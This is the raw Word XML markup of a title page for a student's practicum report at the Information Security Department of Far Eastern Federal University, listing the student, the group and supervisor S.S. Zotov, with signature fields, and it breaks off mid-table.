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2930525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="428625" cy="571500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr descr="logo" id="26" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="logo" id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="428625" cy="571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="9856.999999999998" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="249"/>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Change w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="249"/>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
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Федеральное государственное автономное образовательное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sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">учреждение высшего образования</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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Дальневосточный федеральный университет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="170" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:tcBorders>
              <w:bottom w:color="000000" w:space="0" w:sz="24" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="24" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ШКОЛА ЕСТЕСТВЕННЫХ НАУК</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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AB">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C0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Кафедра информационной безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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EA">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0FF">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114">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">О Т Ч Е Т </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">о прохождении учебной практики (учебно-лабораторного практикума)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">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87">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88">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189">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Выполнил студент </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">гр. С8117-10.05.01ммзи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vMerge w:val="continue"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">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9E">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>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19F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Сысоев А.А.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">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1B2">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1B3">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Отчет защищен с оценкой</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">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DD">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="7"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Руководитель практики</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">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F1">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1F2">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1F3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Старший преподаватель кафедры информационной безопасности ШЕН</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>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00">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">С.С. Зотов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000206">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07">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>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208">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>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20E">
            <w:pPr>
              <w:ind w:left="-108" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">С.С. Зотов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="193" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000215">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000216">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(И.О. Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">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21C">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000222">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(И.О. Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
